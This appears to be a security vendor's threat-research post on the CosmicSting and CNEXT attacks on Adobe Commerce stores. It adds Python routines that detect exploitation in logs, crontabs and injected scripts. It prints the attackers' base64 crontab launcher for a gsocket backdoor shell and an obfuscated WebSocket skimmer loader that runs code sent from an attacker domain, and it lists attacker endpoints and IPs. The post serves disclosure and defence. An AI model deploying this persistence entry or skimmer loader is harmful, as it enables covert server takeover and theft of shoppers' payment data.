Persistent backdoors injected on Adobe Commerce via new CosmicSting attack
by Sansec Forensics Team
Published in Threat Research − August 27, 2024
In our previous posts, we discussed how threat actors were abusing CosmicSting by injecting malicious scripts into CMS blocks. While these attacks continue, we've observed a significant escalation: attackers are now chaining CosmicSting with CNEXT to achieve remote code execution (RCE). We warned of this more sophisticated vector in our initial article and are now seeing active exploitation in the wild.
CosmicSting (CVE-2024-34102) is an XML external entity (XXE) flaw that allows arbitrary file reading on unpatched systems. Chained with CNEXT (CVE-2024-2961), a buffer overflow in glibc's iconv that can be reached through PHP's filter wrappers, that file read becomes remote code execution and a takeover of the entire system. Merchants must patch their systems against both vulnerabilities immediately. Refer to Adobe's troubleshooting guide to mitigate the issue in Adobe Commerce/Magento. We offer a standalone tool for detecting CNEXT.
Exploitation
Logs reveal attempts to exploit this vulnerability:
193.93.193.74, ::1 - - [09/Aug/2024:00:24:42 +0200] "POST /rest/all/V1/guest-carts/test-ambio/estimate-shipping-methods HTTP/1.1" 404 118 "-" "python-requests/2.32.3"
193.93.193.74, ::1 - - [09/Aug/2024:00:24:45 +0200] "POST /rest/all/V1/guest-carts/test-ambio/estimate-shipping-methods HTTP/1.1" 404 118 "-" "python-requests/2.32.3"
193.93.193.74, ::1 - - [09/Aug/2024:00:25:18 +0200] "POST /rest/all/V1/guest-carts/test-ambio/estimate-shipping-methods HTTP/1.1" 504 247 "-" "python-requests/2.32.3"
Notably, the attackers haven't even bothered to change the default test-ambio cart ID from the original Ambionics exploit.
Do not filter on response status when hunting for this: the 404 and 504 responses above do not mean the attempts failed, and successful exploitation can still occur behind 4xx and 5xx status codes.
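A detection routine for access logs like the ones above, added here as an example for this article (it is not Sansec's eComscan or any other tool the post mentions). It assumes a combined log format with an optional proxy chain after the client IP, as in the lines above; the two attack lines are copied from the post, the other two are constructed to show a legitimate checkout request on the same endpoint and an unrelated call.

```python
"""Flag CosmicSting (CVE-2024-34102) attempts in web-server access logs.

Added example for this article, not Sansec tooling. Log lines are either
copied from the post or constructed; nothing here touches a live system.
"""
import re

# Combined log format; the client IP may be followed by a proxy chain
# (", ::1" in the post's lines) because the log comes from behind a reverse proxy.
LOG_RE = re.compile(
    r'^(?P<ip>[0-9a-fA-F.:]+)(?:, \S+)* - - \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# The REST call abused by the public exploit. Any store code and cart ID work;
# "test-ambio" is the default the original Ambionics PoC ships with.
CART_ENDPOINT_RE = re.compile(
    r'^/rest/(?:[^/]+/)?V1/guest-carts/(?P<cart>[^/]+)/estimate-shipping-methods$'
)
DEFAULT_POC_CART = "test-ambio"


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def classify(entry):
    """Return indicator names for a parsed entry, or [] if nothing matches.

    The HTTP status is deliberately ignored: the post shows 404 and 504
    responses for requests that can still have fired the payload.
    """
    if entry is None or entry["method"] != "POST":
        return []
    m = CART_ENDPOINT_RE.match(entry["path"].split("?", 1)[0])
    if not m:
        return []
    hits = ["cosmicsting-endpoint"]
    if m.group("cart") == DEFAULT_POC_CART:
        hits.append("default-poc-cart-id")
    if entry["ua"].startswith("python-requests/"):
        hits.append("scripted-client")
    return hits


def scan(lines):
    """Return (ip, status, indicators) for every request worth triaging."""
    results = []
    for line in lines:
        entry = parse_line(line)
        hits = classify(entry)
        if hits:
            results.append((entry["ip"], int(entry["status"]), hits))
    return results


# Constructed sample: two attack lines from the post, one legitimate checkout
# POST to the same endpoint (browser UA, real referer) and one unrelated call.
SAMPLE_LOG = [
    '193.93.193.74, ::1 - - [09/Aug/2024:00:24:42 +0200] "POST /rest/all/V1/guest-carts/test-ambio/estimate-shipping-methods HTTP/1.1" 404 118 "-" "python-requests/2.32.3"',
    '193.93.193.74, ::1 - - [09/Aug/2024:00:25:18 +0200] "POST /rest/all/V1/guest-carts/test-ambio/estimate-shipping-methods HTTP/1.1" 504 247 "-" "python-requests/2.32.3"',
    '203.0.113.9 - - [09/Aug/2024:10:01:02 +0200] "POST /rest/default/V1/guest-carts/abc123xyz/estimate-shipping-methods HTTP/1.1" 200 512 "https://shop.example/checkout" "Mozilla/5.0"',
    '203.0.113.9 - - [09/Aug/2024:10:01:05 +0200] "GET /rest/default/V1/store/storeViews HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, status, hits in scan(SAMPLE_LOG):
        print(f"{ip} {status} {','.join(hits)}")
```

Legitimate checkouts POST to the same endpoint, so the endpoint alone is a weak signal and the routine reports it only as a triage tag. What lifts an entry above the noise is the PoC cart ID, a scripted client, a cart ID that does not exist in the quote tables, and, if request bodies are logged, a DOCTYPE or ENTITY declaration in the JSON payload.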
Backdoor and Persistence
Once the attackers gain a foothold, they first drop two malicious files, defunct and defunct.dat, in ~/.config/htop, the directory htop uses for its own configuration, so that a casual listing shows nothing unusual.
Afterwards, the following entry is added to the system's crontab:
# DO NOT REMOVE THIS LINE. SEED PRNG. #defunct-kernel
0 * * * * { echo L3Vzci9iaW4vcGtpbGwgLTAgLVUxMDA0IGRlZnVuY3QgMj4vZGV2L251bGwgfHwgU0hFTEw9L2Jpbi9iYXNoIFRFUk09eHRlcm0tMjU2Y29sb3IgR1NfQVJHUz0iLWsgL3Zhci93d3cvdmhvc3RzLzxTTklQPi8uY29uZmlnL2h0b3AvZGVmdW5jdC5kYXQgLWxpcUQiIC91c3IvYmluL2Jhc2ggLWMgImV4ZWMgLWEgJ1tyYWlkNXdxXScgJy92YXIvd3d3L3Zob3N0cy88U05JUD4vLmNvbmZpZy9odG9wL2RlZnVuY3QnIiAyPi9kZXYvbnVsbAo|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random # seed prng defunct-kernel
This crontab entry, which runs hourly, decodes to:
/usr/bin/pkill -0 -U1004 defunct 2>/dev/null || SHELL=/bin/bash TERM=xterm-256color GS_ARGS="-k /var/www/vhosts/<SNIP>/.config/htop/defunct.dat -liqD" /usr/bin/bash -c "exec -a '[raid5wq]' '/var/www/vhosts/<SNIP>/.config/htop/defunct'" 2>/dev/null
This entry runs hourly and acts as a watchdog. pkill -0 -U1004 defunct only tests whether a process named defunct is already running under UID 1004; if it is not, the || branch relaunches it, and exec -a sets argv[0] so the relaunched binary shows up in process listings as a kernel thread named [raid5wq]. Observed process names include [kswapd0], [slub_flushwq], [card0-crtc8], [netns] and others. The disguise does not survive a closer look: genuine kernel threads are children of kthreadd (PID 2) and have no /proc/<pid>/exe target, whereas this process is owned by the compromised account (UID 1004 here) and its exe link points at the dropped file.
The binary dropped at ~/.config/htop/defunct is identified as gsocket. The Global Socket Toolkit facilitates peer-to-peer TCP connections, even through NAT and firewalls, using end-to-end encryption and a relay network; both ends connect outbound to the relay, so the backdoor opens no listening port and inbound firewalling does not stop it. Its Tor support makes it particularly attractive for malicious actors seeking anonymity.
Several options are passed to gsocket:
- The ~/.config/htop/defunct.dat file contains the secret used to establish the encrypted connection and is passed with -k. Both ends derive the relay address and the session key from this secret, so preserve the file as evidence rather than just deleting it: it identifies the attacker's session.
- The remaining options -liqD ensure that a quiet (-q) interactive (-i) server shell (-l) is spawned in daemon mode (-D).
This allows the attackers to maintain persistent, covert access to the compromised system.
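The crontab entry above, as an added worked example that is not part of the post and not Sansec's tooling: a scanner that pulls the inline base64 out of echo|base64 -d|bash pipelines, decodes it (adding the padding the attacker left off the end of the blob) and extracts the gsocket indicators from the result. The only input is the crontab text from the post, with the paths Sansec already redacted as <SNIP>; the switch parsing assumes gsocket's documented single-letter options.

```python
"""Decode inline base64 in crontab entries and flag gsocket launchers.

Added example for this article, not part of the post and not Sansec tooling.
Input is the crontab text from the post; paths were already redacted by Sansec.
"""
import base64
import binascii
import re
import shlex

# echo <b64> | base64 -d | bash, with or without whitespace around the pipes.
B64_PIPE_RE = re.compile(
    r'echo\s+([A-Za-z0-9+/=]{16,})\s*\|\s*base64\s+(?:-d|--decode)\s*\|\s*(?:ba)?sh'
)

# Traits of the decoded launcher. Group 1, where present, is the detail to report.
GSOCKET_MARKERS = {
    "gs_args_env": re.compile(r'\bGS_ARGS='),
    "gs_secret_file": re.compile(r'-k\s+(\S+)'),
    "argv0_spoof": re.compile(r"exec\s+-a\s+'?(\[[^\]']+\])"),
    "liveness_probe": re.compile(r'\bpkill\s+-0\b'),
}


def decode_inline_base64(crontab_text):
    """Return [(raw_b64, decoded_text)] for each echo|base64 -d|bash pipeline."""
    out = []
    for m in B64_PIPE_RE.finditer(crontab_text):
        raw = m.group(1)
        padded = raw + "=" * (-len(raw) % 4)  # the blob in the post lacks its trailing '='
        try:
            decoded = base64.b64decode(padded, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            continue
        out.append((raw, decoded))
    return out


def analyse_command(cmd):
    """Extract gsocket indicators from a decoded launcher command."""
    findings = {}
    for name, rx in GSOCKET_MARKERS.items():
        m = rx.search(cmd)
        if m:
            findings[name] = m.group(1) if m.groups() else True
    m = re.search(r'GS_ARGS="([^"]*)"', cmd)
    if m:
        # Collapse the listener switches (-l listen, -i interactive, -q quiet,
        # -D daemon); -k takes the secret file and is reported separately.
        switches = [t for t in shlex.split(m.group(1)) if t.startswith("-") and t != "-k"]
        findings["gs_flags"] = "".join(s.lstrip("-") for s in switches)
    return findings


def scan_crontab(crontab_text):
    """Return one report per decoded payload; is_gsocket marks the launcher."""
    reports = []
    for raw, cmd in decode_inline_base64(crontab_text):
        f = analyse_command(cmd)
        reports.append({
            "command": cmd.strip(),
            "findings": f,
            "is_gsocket": "gs_args_env" in f or "gs_flags" in f,
        })
    return reports


# The crontab entry from the post, verbatim (paths redacted by Sansec as <SNIP>).
CRONTAB = (
    "# DO NOT REMOVE THIS LINE. SEED PRNG. #defunct-kernel\n"
    "0 * * * * { echo L3Vzci9iaW4vcGtpbGwgLTAgLVUxMDA0IGRlZnVuY3QgMj4vZGV2L251bGwgfHwgU0hFTEw9L2Jpbi9iYXNoIFRFUk09eHRlcm0tMjU2Y29sb3IgR1NfQVJHUz0iLWsgL3Zhci93d3cvdmhvc3RzLzxTTklQPi8uY29uZmlnL2h0b3AvZGVmdW5jdC5kYXQgLWxpcUQiIC91c3IvYmluL2Jhc2ggLWMgImV4ZWMgLWEgJ1tyYWlkNXdxXScgJy92YXIvd3d3L3Zob3N0cy88U05JUD4vLmNvbmZpZy9odG9wL2RlZnVuY3QnIiAyPi9kZXYvbnVsbAo|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random # seed prng defunct-kernel\n"
)

if __name__ == "__main__":
    for r in scan_crontab(CRONTAB):
        print("gsocket launcher" if r["is_gsocket"] else "unknown payload")
        print(r["command"])
        for k, v in r["findings"].items():
            print(f"  {k}: {v}")
```

Run it over the user crontabs under /var/spool/cron and the files in /etc/cron*; the decoy comment about seeding the PRNG is exactly the kind of line this routine ignores, because it only acts on what is actually piped into a shell.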
Websocket Injection
Like all Magecart attacks, these are financially motivated. We've observed the following script being added to the store's header (the endpoint differs per store):
const xcmw = [93,89,89,16,5,5,89,79,70,70,79,88,89,94,75,94,4,89,67,94,79,5,93,89,89,21,89,69,95,88,73,79,23];
const tpkd = 42;
window.ww = new WebSocket(String.fromCharCode(...xcmw.map(hnax => hnax ^ tpkd)) + encodeURIComponent(location.href));
window.ww.addEventListener('message', event => {new Function(event.data)()});
This script opens a WebSocket to wss://sellerstat.site/wss, appends the current page URL as the source query parameter (the XOR-decoded array reads wss://sellerstat.site/wss?source=), and executes any JavaScript the server sends through new Function. The domains and payloads delivered via the websocket differ between affected stores but always aim to steal customer payment data through various injection techniques. Because the skimming logic itself is never stored in the store's code base, only this small loader, attackers can adapt their payloads in real time, which makes detection and mitigation significantly more challenging.
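Decoding the obfuscated endpoint, as an added example that is not the post's code: the routine pulls the numeric array, the XOR key and the map(... ^ ...) expression out of the loader, recovers the endpoint, and checks it against the WebSocket indicators listed at the end of this article. The loader text is copied from the post; the regular expressions are assumptions about this loader's exact shape and will need adjusting for other variants.

```python
"""Recover the C2 endpoint from the XOR-obfuscated WebSocket loader.

Added example for this article, not the post's code. The loader text is
copied from the post; the regexes assume this loader's exact shape.
"""
import re
from urllib.parse import urlsplit

# WebSocket IoCs from the end of the post, used for the match step.
WS_IOCS = {
    "wss://accept.bar/common",
    "wss://amocha.xyz/common",
    "wss://cdn-webstats.com/ls",
    "wss://clearnetfab.net/common",
    "wss://fallodick87-78.sbs/common",
    "wss://cd.iconstaff.top/m",
    "wss://cdn.iconstaff.top/common",
    "wss://cdn.inspectdlet.net/ws",
    "wss://jqueryuslibs.com/common",
    "wss://jstatic201.com/common",
    "wss://lererikal.org/common",
    "wss://mamatmavali.ru/common",
    "wss://nothingillegal.bond/common",
    "wss://paie-locli.com/s",
    "wss://sellerstat.site/wss",
    "wss://statsseo.com/common",
    "wss://statstoday.org/common",
    "wss://vincaolet.xyz/socket",
    "wss://webexcelsior.org/common",
}

# Copied from the post: the loader injected into the store header.
SKIMMER_JS = """
const xcmw = [93,89,89,16,5,5,89,79,70,70,79,88,89,94,75,94,4,89,67,94,79,5,93,89,89,21,89,69,95,88,73,79,23];
const tpkd = 42;
window.ww = new WebSocket(String.fromCharCode(...xcmw.map(hnax => hnax ^ tpkd)) + encodeURIComponent(location.href));
window.ww.addEventListener('message', event => {new Function(event.data)()});
"""

ARRAY_RE = re.compile(r'(?:const|let|var)\s+(\w+)\s*=\s*\[([\d,\s]+)\]')
INT_RE = re.compile(r'(?:const|let|var)\s+(\w+)\s*=\s*(\d+)\s*;')
XOR_MAP_RE = re.compile(r'(\w+)\.map\(\s*(\w+)\s*=>\s*\2\s*\^\s*(\w+)\s*\)')
REMOTE_EVAL_RE = re.compile(r'new\s+Function\(\s*event\.data\s*\)\s*\(\)')


def xor_decode(values, key):
    """Undo the single-byte XOR the loader applies before String.fromCharCode."""
    return "".join(chr(v ^ key) for v in values)


def analyse_loader(js):
    """Return the decoded endpoint, its host, IoC match and eval sink, or None."""
    arrays = {m.group(1): [int(x) for x in m.group(2).split(",") if x.strip()]
              for m in ARRAY_RE.finditer(js)}
    ints = {m.group(1): int(m.group(2)) for m in INT_RE.finditer(js)}
    use = XOR_MAP_RE.search(js)
    if not use or use.group(1) not in arrays or use.group(3) not in ints:
        return None
    url = xor_decode(arrays[use.group(1)], ints[use.group(3)])
    parts = urlsplit(url)
    endpoint = f"{parts.scheme}://{parts.netloc}{parts.path}"
    return {
        "url": url,
        "host": parts.hostname,
        "ioc": endpoint if endpoint in WS_IOCS else None,
        "remote_eval": bool(REMOTE_EVAL_RE.search(js)),
    }


if __name__ == "__main__":
    print(analyse_loader(SKIMMER_JS))
```

The decoded value for the snippet in the post is wss://sellerstat.site/wss?source=, so the attacker learns which page the victim is on before choosing a payload. A Content-Security-Policy whose connect-src lists only the store's own origins blocks the socket before any payload arrives; the loader itself still has to be found and removed.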
Indicators of Compromise
WebSocket endpoints contacted by the injected loader:
wss://accept.bar/common
wss://amocha.xyz/common
wss://cdn-webstats.com/ls
wss://clearnetfab.net/common
wss://fallodick87-78.sbs/common
wss://cd.iconstaff.top/m
wss://cdn.iconstaff.top/common
wss://cdn.inspectdlet.net/ws
wss://jqueryuslibs.com/common
wss://jstatic201.com/common
wss://lererikal.org/common
wss://mamatmavali.ru/common
wss://nothingillegal.bond/common
wss://paie-locli.com/s
wss://sellerstat.site/wss
wss://statsseo.com/common
wss://statstoday.org/common
wss://vincaolet.xyz/socket
wss://webexcelsior.org/common
Base64 forms of the string .config/htop/defunct (one per 3-byte alignment, for grepping crontabs and other encoded payloads):
5jb25maWcvaHRvcC9kZWZ1bmN0
uY29uZmlnL2h0b3AvZGVmdW5jd
LmNvbmZpZy9odG9wL2RlZnVuY3
Attacker IP addresses:
165.231.182.98
45.10.160.45
193.93.193.74
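The three base64 indicators above are the three alignments of the path .config/htop/defunct: base64 emits four characters per three input bytes, so a string embedded in a larger blob is encoded one of three ways depending on how many bytes precede it. The following routine, added here as an example (not Sansec's tooling), derives such patterns for any string, trims the characters that depend on the unknown surrounding bytes, and checks which alignments occur in the crontab blob from the post.

```python
"""Base64 alignment patterns for grepping encoded payloads.

Added example for this article, not Sansec tooling. Base64 emits 4 characters
per 3 input bytes, so a string embedded in a larger blob takes one of three
encodings depending on how many bytes precede it. The post's three base64 IoCs
are exactly the three alignments of ".config/htop/defunct".
"""
import base64
import re

# Leading characters that depend on the unknown bytes before the needle, per phase.
_LEAD_DROP = {0: 0, 1: 2, 2: 3}
# Trailing characters (including '=' padding) that depend on the bytes after it,
# keyed by (phase + len(needle)) % 3.
_TAIL_DROP = {0: 0, 1: 3, 2: 2}


def base64_alignments(needle):
    """Return the three alignment-stable base64 patterns for `needle`."""
    data = needle.encode()
    patterns = []
    for phase in range(3):
        # Prepend `phase` dummy bytes to shift the needle into that alignment.
        enc = base64.b64encode(b"\x00" * phase + data).decode()
        head = _LEAD_DROP[phase]
        tail = _TAIL_DROP[(phase + len(data)) % 3]
        patterns.append(enc[head:len(enc) - tail])
    return patterns


def find_encoded(haystack, needle):
    """Return the phases (0, 1, 2) at which `needle` appears base64-encoded in `haystack`."""
    return [phase for phase, pat in enumerate(base64_alignments(needle)) if pat in haystack]


def grep_regex(needles):
    """One alternation covering every alignment of every needle, usable with grep -E."""
    return "|".join(re.escape(p) for n in needles for p in base64_alignments(n))


# The base64 blob from the crontab entry in the post; it embeds the path twice.
CRON_BLOB = (
    "L3Vzci9iaW4vcGtpbGwgLTAgLVUxMDA0IGRlZnVuY3QgMj4vZGV2L251bGwgfHwgU0hFTEw9L2Jpbi9iYXNo"
    "IFRFUk09eHRlcm0tMjU2Y29sb3IgR1NfQVJHUz0iLWsgL3Zhci93d3cvdmhvc3RzLzxTTklQPi8uY29uZmln"
    "L2h0b3AvZGVmdW5jdC5kYXQgLWxpcUQiIC91c3IvYmluL2Jhc2ggLWMgImV4ZWMgLWEgJ1tyYWlkNXdxXScg"
    "Jy92YXIvd3d3L3Zob3N0cy88U05JUD4vLmNvbmZpZy9odG9wL2RlZnVuY3QnIiAyPi9kZXYvbnVsbAo"
)

if __name__ == "__main__":
    for p in base64_alignments(".config/htop/defunct"):
        print(p)
    print(find_encoded(CRON_BLOB, ".config/htop/defunct"))
    print(grep_regex([".config/htop/defunct", "GS_ARGS="]))
```

Generating the patterns this way also covers strings the post does not list, such as the GS_ARGS= marker or the secret file name, and grep -E with the output of grep_regex over /var/spool/cron and /etc/cron* finds them without decoding anything first.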